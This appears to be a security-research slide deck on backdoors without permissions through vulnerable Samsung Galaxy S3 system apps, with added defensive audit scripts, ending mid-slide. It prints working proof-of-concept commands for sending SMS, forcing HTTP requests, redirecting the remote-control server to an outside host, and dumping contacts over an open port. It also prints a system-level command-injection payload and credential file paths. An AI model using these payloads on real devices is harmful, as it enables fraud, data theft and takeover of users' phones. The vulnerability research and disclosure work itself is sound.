Android OEM's applications (in)security and backdoors without permission
André [email protected]
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
Context and objectives
Why Android?
Most used mobile OS
Security often questioned because of the many malware samples
Unofficial markets (warez)
Show how an application without any permission can take control of a smartphone
Targeted user
Security-aware user
Doesn't use alternative markets
Checks permissions before installing an application
Targeted smartphone
Samsung Galaxy S3 (I9300)
50 million units sold (March 2013)
More precisely, the Samsung overlay shipped on the I9300
Some of these applications may also be present on other models
Some vulnerabilities may impact other models (S2, S4, Note 1/2, ...)
The vulnerable applications can't be removed without root access
Android system and the applications
The Android system
Generalities and common knowledge
Mobile OS (smartphone/tablet), "open source"
Based on Linux
Developed in C and Java
A dedicated virtual machine: the Dalvik VM
Dalvik bytecode (DEX/ODEX)
What is an Android application?
An APK file (actually a ZIP file)
The APK's most important files:
AndroidManifest.xml (configuration, permissions, components, ...)
classes.dex (executable bytecode)
Native libraries as .so files (JNI)
Each application has a unique name (package name) and is signed by its developer (certificate)
Classical components of an Android application
The applicative components: Activity, Service, BroadcastReceiver, ContentProvider (diagram)
The communication between components
The Intent: source of communication in Android
The exposure of components
Can we talk to this component?
Exported or not, that's the question
By default, components are not exported
Special case: ContentProvider, which is exported by default
The component status, exported or not, is defined in AndroidManifest.xml:
The attribute android:exported=[true|false]
The presence of an intent-filter (the component is then automatically exported)
A component can be exported but protected by a permission
Example of AndroidManifest.xml (listing not recoverable from this extraction)
Application isolation
One user per application
Security by isolation
Default behaviour:
Each application has a dedicated Linux user (and therefore a UID) on the system
Special case:
An application can ask to share a UID with another application
sharedUserId mechanism (AndroidManifest.xml)
To share a UID, the two applications must be signed with the same certificate
Consequences
Isolation between applications in memory (separate processes)
Isolation on the filesystem
Does not protect against world-readable/writable files
The permission system
Application restrictions
Least-privilege security
Permissions protect dangerous actions:
SD card write access, INTERNET access, sending SMS, ...
By default, an application has no permission at all
Permissions must be requested explicitly in AndroidManifest.xml
Requested permissions are shown to the user at installation time: a boolean (all-or-nothing) choice
A permission can protect:
Functions: AccountManager.getAccounts() (GET_ACCOUNTS)
Intents: android.intent.action.CALL (CALL_PHONE)
Components: content://contacts (READ_CONTACTS, ...)
A permission is granted to a UID, not to a package name
The permission model applies to native code too
All permissions of the applications sharing the same sharedUserId are combined
Consequences of the permission model
Components can be protected
The user "knows" what the application can do once it is installed, and thus the associated risks
Limits the impact of a vulnerable application
A huge attack surface
The attack surface
Important folders
We want to build a backdoor targeting an Android smartphone
Userland vulnerabilities (easy to find, easy to exploit)
Folders customized by manufacturers on an Android smartphone:
/system/app
/system/framework
/system/bin
/system/lib
The content of these folders may also change between operators (carrier builds)
A large number of applications
Only two folders examined, but a considerable attack surface
216 APKs in /system/app
For comparison: 91 APKs on the Nexus 4
Vulnerability research
Automation
Constraints
Many applications: automation is needed to find the interesting ones
Then manual audit (reverse engineering)
Exploitation of vulnerabilities with few or no permissions at all
Creation of some scripts: ASA
Based on Androguard (great framework)
ASAManifest: analyzes the manifest of an application and tells which components are exported and under what conditions
ASADatabase: analyzes a large number of applications as ASAManifest does and checks for sensitive API usage. The results are stored in a MongoDB database.
ASADiff (ongoing): diff between two versions of a system, for example to detect vulnerability patching.
ASAManifest
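The export rules from the "exposure of components" slide and the ASAManifest analysis described under Automation, as a Python script added here for illustration. It is not part of ASA or Androguard and is not the authors' code. It parses a decoded AndroidManifest.xml with the standard library only, so it expects the XML form produced by apktool or aapt, not the binary manifest inside the APK. It applies the rules from the slide (an explicit android:exported attribute wins, an intent-filter exports the component, a ContentProvider is exported by default when the application targets API level 16 or lower) and also reports the sharedUserId and the requested permissions discussed on the security-model slides. The sample manifest, its package, component and permission names are constructed for this example.

```python
"""Exported-component analysis of a decoded AndroidManifest.xml (added example)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
# From this targetSdkVersion on, a <provider> is no longer exported by default.
PROVIDER_DEFAULT_CHANGE = 17


def _attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def export_status(component, target_sdk):
    """Return (exported, reason) for one component element."""
    explicit = _attr(component, "exported")
    if explicit is not None:                      # explicit attribute wins
        return explicit.lower() == "true", "android:exported=" + explicit
    if component.tag == "provider":               # the special case
        if target_sdk < PROVIDER_DEFAULT_CHANGE:
            return True, "provider default (targetSdkVersion < 17)"
        return False, "provider default (targetSdkVersion >= 17)"
    if component.find("intent-filter") is not None:
        return True, "intent-filter present"      # implicitly exported
    return False, "not exported by default"


def analyze_manifest(xml_text):
    """Summarize the attack surface a manifest declares.

    The result holds the package name, the sharedUserId (None if absent),
    the requested permissions, and one entry per exported component with
    the permission guarding it (None: callable by any application) and the
    intent actions it filters on.
    """
    root = ET.fromstring(xml_text)
    uses_sdk = root.find("uses-sdk")
    target_sdk = 1
    if uses_sdk is not None:
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion")
                         or _attr(uses_sdk, "minSdkVersion") or 1)
    app = root.find("application")
    exported = []
    for comp in (app if app is not None else []):
        if comp.tag not in COMPONENT_TAGS:
            continue
        is_exported, reason = export_status(comp, target_sdk)
        if not is_exported:
            continue
        exported.append({
            "type": comp.tag,
            "name": _attr(comp, "name"),
            "reason": reason,
            "permission": _attr(comp, "permission"),
            "actions": [_attr(a, "name") for a in comp.iter("action")],
        })
    return {
        "package": root.get("package"),
        "sharedUserId": _attr(root, "sharedUserId"),
        "uses_permissions": [_attr(p, "name") for p in root.findall("uses-permission")],
        "exported": exported,
    }


def unprotected_exported(report):
    """Exported components that no permission guards: reachable by any application."""
    return [c for c in report["exported"] if c["permission"] is None]


# Constructed sample manifest; package, component and permission names are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.oemsync" android:sharedUserId="android.uid.system">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="OEM Sync">
    <receiver android:name=".ui.BgSender">
      <intent-filter>
        <action android:name="com.example.oemsync.QUICKSEND"/>
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="false"/>
    <activity android:name=".Settings" android:exported="true"
        android:permission="com.example.oemsync.ADMIN"/>
    <provider android:name=".MemoProvider"
        android:authorities="com.example.oemsync.memo"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for comp in unprotected_exported(analyze_manifest(SAMPLE_MANIFEST)):
        print(comp["type"], comp["name"], comp["reason"], comp["actions"])
```

The components returned by unprotected_exported() are the ones any installed application, whatever its own permissions, can send an Intent to; on a real device the next step is the manual audit of their handlers, which is what the deck does for MmsBGSender, PCWReceiver and smlNpsReceiver. Bumping targetSdkVersion to 17 in the sample drops the provider from the list, which is exactly why the targetSdkVersion has to be read before judging a ContentProvider.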
ASADatabase: examples of queries on MongoDB
Applications with the INSTALL_PACKAGES permission
> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})
{ "filename" : "DttSupport.apk" }
{ "filename" : "Kies.apk" }
{ "filename" : "MtpApplication.apk" }
{ "filename" : "PackageInstaller.apk" }
[...]
Number of system applications sharing the android.uid.system UID
> db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count()
41
Which ones really use INSTALL_PACKAGES?
> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()
11
> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true},{filename:1,_id:0}).count()
10
> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false},{filename:1,_id:0})
{ "filename" : "MtpApplication.apk" }
Backdoor’s features
Objectives
SD Card: Android and backward compatibility...
SD Card: a protected storage?
Once upon a time... Android
First versions: total access to the SD card
Read & write access
Current state
Write access: WRITE_EXTERNAL_STORAGE
Read access: currently "tolerated" without permission
Dangerous for user privacy (INTERNET + SD card)
Introduction of the READ_EXTERNAL_STORAGE permission
"Protect the SD card" option in the system settings (Jelly Bean)
And what about backward compatibility?
From the Android documentation, if minSdkVersion and targetSdkVersion
SMS/MMS sending and file exfiltration
Vuln1 - SecMms.apk
Malware and premium SMS
Current Android malware asks for the SEND_SMS permission
Easily detectable and suspicious to a user
What about a malware that can send premium SMS without asking for the permission?
There is an app for that
SecMms.apk
Exported BroadcastReceiver -> ui.MmsBGSender
A well-formed Intent is enough to send arbitrary SMS/MMS
PoC (attachments can also be added)
shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*" --es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"
Arbitrary HTTP request execution
Vuln2 - PCWClientS.apk
PCWReceiver
When an Intent is received with com.sec.pcw.device.HTTP_REQUEST_RETRY as action
The body, uri and pushType extras are extracted and an HTTP POST request is performed from them
The request is issued by PCWClientS with its own INTERNET permission, so the sender of the Intent needs none
PoC
shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri *URL* --es body *POST_DATA* --es pushType *PUSHTYPE*
Getting C.R.U.D. rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
Typical problems with a manufacturer overlay
This vulnerability was patched by Samsung before we reported it
Patched on the S3 but not on the S2, Tab 1, Note 1
Special case: the INTERNET permission is needed
Creation of a socket
smlNpsReceiver
The application exports a BroadcastReceiver, smlNpsReceiver
It answers Intents related to Kies:
com.intent.action.KIES_WSSERVICE_START
com.intent.action.KIES_WSSERVICE_START_WIFI
smlNpsReceiver
    public void onReceive(Context paramContext, Intent paramIntent)
    {
        [...]
        // No check on the sender: any application can broadcast this action
        if (paramIntent.getAction().equals("com.intent.action.KIES_WSSERVICE_START"))
        {
            smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");
            wifi_connected = false;
            usb_connected = true;
            // (Re)start the service that opens the TCP listener
            paramContext.stopService(new Intent(paramContext, smlNpsService.class));
            paramContext.startService(new Intent(paramContext, smlNpsService.class));
        }
        [...]
    }
smlNpsService
When it starts, it runs NpsServiceTask in a thread
Listens on 0.0.0.0:1108 (TCP), i.e. on every interface, not only on loopback
Each connection is handled by smlNpsHandler in a separate thread
The method work() is called to handle the received data
smlNpsHandler.work()
    protected void work()
    {
        if (this.socket != null)
        {
            socketIS = this.socket.getInputStream();
            socketOS = this.socket.getOutputStream();
            // One text line read from the (unauthenticated) client
            cmdLine = this.readLine(socketIS);
            if ((cmdLine != null) && (cmdLine.length() != 0))
            {
                cmdInformation = new String[3];
                v5 = cmdLine.indexOf("BEGIN");
                // The first three characters are the command code
                cmdInformation[0] = cmdLine.substring(0, 3);
                if (v5 [...]
    // Dispatch on the command code; nothing checks who is connected
    case 70:
        v1 = this.GetContact(cmdInformation[1]);
        v2 = 0;
        break;
    [...]
    case 72:
        v1 = this.GetContactsIndexArray(
            com.wssnps.database.smlContactItem$StorageType.SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());
        v2 = 0;
        break;
    [...]
    case 90:
        v1 = this.GetCalendar(cmdInformation[1]);
        v2 = 0;
        break;
    [...]
    [...]
    case 453:
        v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();
        if(v1
PoC
    $ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_START
    Broadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START }
    Broadcast completed: result=0
    $ adb shell netstat |grep 1108
    tcp6 0 0 :::1108 :::* LISTEN
    $ adb forward tcp:1108 tcp:1108
    $ nc localhost 1108 -v
    Connection to localhost 1108 port [tcp/*] succeeded!
    090 1 # getCalendar(1)
    0
    BEGIN:VCALENDAR
    VERSION:1.0
    BEGIN:VEVENT
    SUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013
    DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Conf
    LOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Rennes
    DTSTART:20130605T170000Z
    DTEND:20130607T180000Z
    X-ALLDAY:UNSET
    X-CALENDARGROUP:1
    UID:000000000000000000000000000000000000000000000001
    END:VEVENT
    END:VCALENDAR
PoC (continued)
    072 # get the id of contacts on the smartphone (not the SIM)
    0
    2 # number of contacts
    8,9, # id of the contacts
    070 9 # getContact(9)
    0
    BEGIN:VCARD
    VERSION:2.1
    N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;;
    TEL;HOME;CELL:06 06 06 06 06
    EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:[email protected]:1
    X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phone
    END:VCARD
    453 32 # install APK from /sdcard/restore/
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Some available features...
C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...
Backup of mail accounts
Installation of arbitrary application
How was it patched?
Permission added on the component for the action KIES_WSSERVICE_START
android.permission.COM_WSSNPS has a protectionLevel of signatureOrSystem
Objectives
Sync for fun and profit
Vuln4 - Sync and remote control applications...
FmmDM, FmmDS, ...
There are applications to do data sync and remote control of the smartphone
"Security" => "Remote controls"
The user can remote control his phone via http://samsungdive.com/
Vulnerabilities
These applications export a BroadcastReceiver
With the correct Intent, you can change the default server used for sync and remote control by the smartphone
PoC for FmmDM
    shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL --es DMServer "http://sh4ka.fr:80/test/trololo.php"
I don't need root when I have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
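An audit script, added here as an example and not part of the talk, that applies the manifest side of the two search criteria above (sharedUserId = system; the command-execution API has to be looked for in the bytecode) and also flags the pattern behind Vuln3 and Vuln4: an exported component reachable without any permission, or guarded by a permission whose protectionLevel is weaker than signature/signatureOrSystem. The two manifests embedded below are constructed samples built from the component and permission names used in the talk, not the real manifests of serviceModeApp.apk or wssyncmlnps.apk.

```python
"""Flag manifest patterns from the talk: system UID and unprotected exported components.

Added example. The manifests below are constructed samples modeled on the components
named in the talk, not the vendor's real files.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # ElementTree's form of the android: prefix
STRONG_LEVELS = {"signature", "signatureOrSystem"}
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def is_exported(component):
    """Pre-Android-12 default: a component with an intent-filter is exported
    unless android:exported="false" says otherwise."""
    explicit = component.get(A + "exported")
    if explicit is not None:
        return explicit == "true"
    return component.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return a list of human-readable findings for one AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.get(A + "sharedUserId") == "android.uid.system":
        findings.append("manifest: runs as system (sharedUserId=android.uid.system)")
    # protectionLevel of every permission this package declares; a <permission>
    # without the attribute defaults to "normal", which any app can request.
    levels = {p.get(A + "name"): p.get(A + "protectionLevel", "normal")
              for p in root.iter("permission")}
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp):
            continue
        name = comp.get(A + "name")
        actions = ", ".join(a.get(A + "name") for a in comp.iter("action"))
        perm = comp.get(A + "permission")
        if perm is None:
            findings.append("%s %s: exported with no permission (actions: %s)"
                            % (comp.tag, name, actions))
        elif perm not in levels:
            findings.append("%s %s: guarded by %s, declared elsewhere; verify its protectionLevel"
                            % (comp.tag, name, perm))
        elif levels[perm] not in STRONG_LEVELS:
            findings.append("%s %s: guarded by %s but protectionLevel is %s"
                            % (comp.tag, name, perm, levels[perm]))
    return findings


# Constructed sample: the pre-patch shape described in the talk (system UID, open receivers).
VULNERABLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.oemapp" android:sharedUserId="android.uid.system">
  <application>
    <receiver android:name=".FTATDumpReceiver">
      <intent-filter><action android:name="com.android.sec.FTAT_DUMP"/></intent-filter>
    </receiver>
    <receiver android:name=".KiesReceiver">
      <intent-filter><action android:name="com.intent.action.KIES_WSSERVICE_START"/></intent-filter>
    </receiver>
    <service android:name=".FTATDumpService"/>
  </application>
</manifest>"""

# Constructed sample of the fix the talk describes: a signatureOrSystem permission on the receiver.
PATCHED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.oemapp">
  <permission android:name="android.permission.COM_WSSNPS"
              android:protectionLevel="signatureOrSystem"/>
  <application>
    <receiver android:name=".KiesReceiver" android:permission="android.permission.COM_WSSNPS">
      <intent-filter><action android:name="com.intent.action.KIES_WSSERVICE_START"/></intent-filter>
    </receiver>
    <service android:name=".FTATDumpService" android:exported="false"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_MANIFEST), ("patched", PATCHED_MANIFEST)):
        print(label, audit_manifest(text) or ["no findings"])
```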
FTATDumpReceiver.onReceive()
    public void onReceive(Context paramContext, Intent paramIntent)
    {
        String str1 = paramIntent.getAction();
        Log.i("FTATDumpReceiver", "onReceive action=" + str1);
        if (str1.equals("com.android.sec.FTAT_DUMP"))
        {
            // the FILENAME extra comes straight from the broadcast sender
            String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
            Calendar localCalendar = Calendar.getInstance();
            String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get(1));
            [...]
            String str9 = str8 + new DecimalFormat("00").format(localCalendar.get(13));
            Log.i("FTATDumpReceiver", "Dump Filename is" + str9);
            Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
            localIntent2.setFlags(268435456);
            localIntent2.putExtra("FILENAME", str9);
            paramContext.startService(localIntent2);
        }
        [...]
    }
FTATDumpService.onStartCommand()
    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
    {
        Log.i("FTATDumpService", "onStartCommand()");
        this.mHandler.sendEmptyMessage(1005);
        final String str = paramIntent.getStringExtra("FILENAME");
        [...]
        new Thread(new Runnable()
        {
            public void run()
            {
                FTATDumpService.this.sendMessage(
                    FTATDumpService.access$600(FTATDumpService.this),
                    FTATDumpService.this.mHandler.obtainMessage(1014)
                );
                // str is concatenated unchanged into a shell command line
                if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
                    FTATDumpService.this.mHandler.sendEmptyMessage(1015);
                [...]
            }
        }).start();
        return 0;
    }
FTATDumpService.DoShellCmd()
    private boolean DoShellCmd(String paramString)
    {
        Log.i("FTATDumpService", "DoShellCmd : " + paramString);
        String[] arrayOfString = new String[3];
        arrayOfString[0] = "/system/bin/sh";
        arrayOfString[1] = "-c";
        arrayOfString[2] = paramString;   // whole command line parsed by sh, as system
        Log.i("FTATDumpService", "exec command");
        Runtime.getRuntime().exec(arrayOfString).waitFor();
        Log.i("FTATDumpService", "exec done");
        Log.i("FTATDumpService", "DoShellCmd done");
        return true;
    }
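The defect is plain string concatenation of a sender-controlled extra into a command line that sh -c parses. The following added example (mine, not code from serviceModeApp.apk; it mirrors the Java logic in Python) puts that construction beside a hardened one that validates FILENAME against a strict allowlist, confines the output path to the log directory and runs the dump binary without a shell, so the payload from the talk's PoC is rejected instead of executed. The dumpstate path is an assumption.

```python
"""Vulnerable vs hardened construction of FTATDumpService's dump command.

Added example: a Python rendering of the Java logic on the page, not the vendor's code.
"""
import os
import re
import subprocess

LOG_DIR = "/data/log"                 # output directory used by the service (from the talk)
DUMPSTATE = "/system/bin/dumpstate"   # assumed path of the dump binary
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")  # no '/', '.', ';', '>' or whitespace


def vulnerable_shell_argv(filename):
    """What DoShellCmd builds: the extra is spliced into one string that sh -c parses,
    so ';', '>' and '../' inside FILENAME are interpreted, not treated as a name."""
    return ["/system/bin/sh", "-c", "dumpstate > " + LOG_DIR + "/" + filename + ".log"]


def hardened_dump_plan(filename, log_dir=LOG_DIR):
    """Validate the name, then return (argv, log_path) with no shell in the loop.

    Raises ValueError for anything outside the allowlist or escaping log_dir."""
    if not isinstance(filename, str) or not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected FILENAME: %r" % (filename,))
    log_path = os.path.normpath(os.path.join(log_dir, filename + ".log"))
    if os.path.dirname(log_path) != os.path.normpath(log_dir):   # defence in depth
        raise ValueError("path escapes %s: %s" % (log_dir, log_path))
    return [DUMPSTATE], log_path


def is_accepted(filename, log_dir=LOG_DIR):
    """True if the hardened path would run for this FILENAME value."""
    try:
        hardened_dump_plan(filename, log_dir)
        return True
    except ValueError:
        return False


def run_dump(filename, log_dir=LOG_DIR, dumpstate_argv=None):
    """Execute the hardened plan: the redirect is done by this process, not by a shell."""
    argv, log_path = hardened_dump_plan(filename, log_dir)
    if dumpstate_argv is not None:       # stand-in binary for demos off-device
        argv = list(dumpstate_argv)
    with open(log_path, "wb") as log:
        return subprocess.run(argv, stdout=log, stderr=subprocess.DEVNULL).returncode


# FILENAME value from the talk's PoC, kept only to compare the two code paths on it.
POC_FILENAME = "../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#"

if __name__ == "__main__":
    print("sh -c sees:", vulnerable_shell_argv(POC_FILENAME)[2])
    print("hardened accepts PoC value:", is_accepted(POC_FILENAME))
    print("hardened plan for a clean name:", hardened_dump_plan("FTAT_20130605"))
```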
Srsly?
PoC
    $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#'
    Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }
    Broadcast completed : result=0
    $ adb shell cat /sdcard/shellescape
    uid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct)
Inventory of the permissions obtained
Inventory
Combination of all the permissions of sharedUserId=system applications
A total of 156 permissions
Like android.permission.INSTALL_PACKAGE (pm install package.apk)
Like access to mail accounts, SMS, internet, ...
We can inject code inside other applications (dalvik-cache)
Sensitive information can be read
Wifi keys: /data/misc/wifi/wpa_supplicant.conf
Password/PIN code/pattern: gesture.key, password.key, ...
Mail accounts and Google Account token: /data/system/user/X/accounts.db
Objectives
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
Samsung MDM for fun and laziness
I can haz your sms?
7 Scope of the vulnerabilities
8 Conclusion
Samsung MDM for fun and laziness
Samsung's MDM: SAFE
Discovery of SAFE
SAmsung For Enterprise: a framework for Samsung models
Exposes an API for the commercial MDMs
Used partly by SamsungDive
Implemented partly in /system/framework/services.odex
Study of the permission system
Many modules: BrowserPolicy, DevicePolicy, ...
Each module checks that the calling application has the correct permission:
One permission per module: android.permission.sec.MDM_XXX
Enforcement via enforceXXXPermission()
SAFE: the god mode
The framework doesn't check the permission when the calling application is system (UID = 1000)
SAFE: The god mode
MDM usage without any restriction
The features implemented (for us?):
Application Policy - application backup, application uninstall, ...
Mail Account Policy - manage mail accounts, behaviour when SSL certificates are invalid, ...
Enterprise VPN Policy - retrieval of the certificates, passwords, ...
Phone Restriction - block WiFi, VPN connection, USB debug, OTA firmware updates, reset to factory settings, ...
Misc Policy - retrieve the clipboard content, ...
We can "infect" someone and prevent him from receiving the firmware updates that correct vulnerabilities.
I can haz your sms?
SMS Forwarding
DSMLawmo.apk
Study of the applications listening for incoming SMS
BroadcastReceiver listening for Intent with action android.provider.Telephony.SMS_RECEIVED
DSMLawmo.apk seems to have an interesting functionality...
    [...]
    if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))
    {
        Util.Logd("Start to SMS forwarding service");
        [...]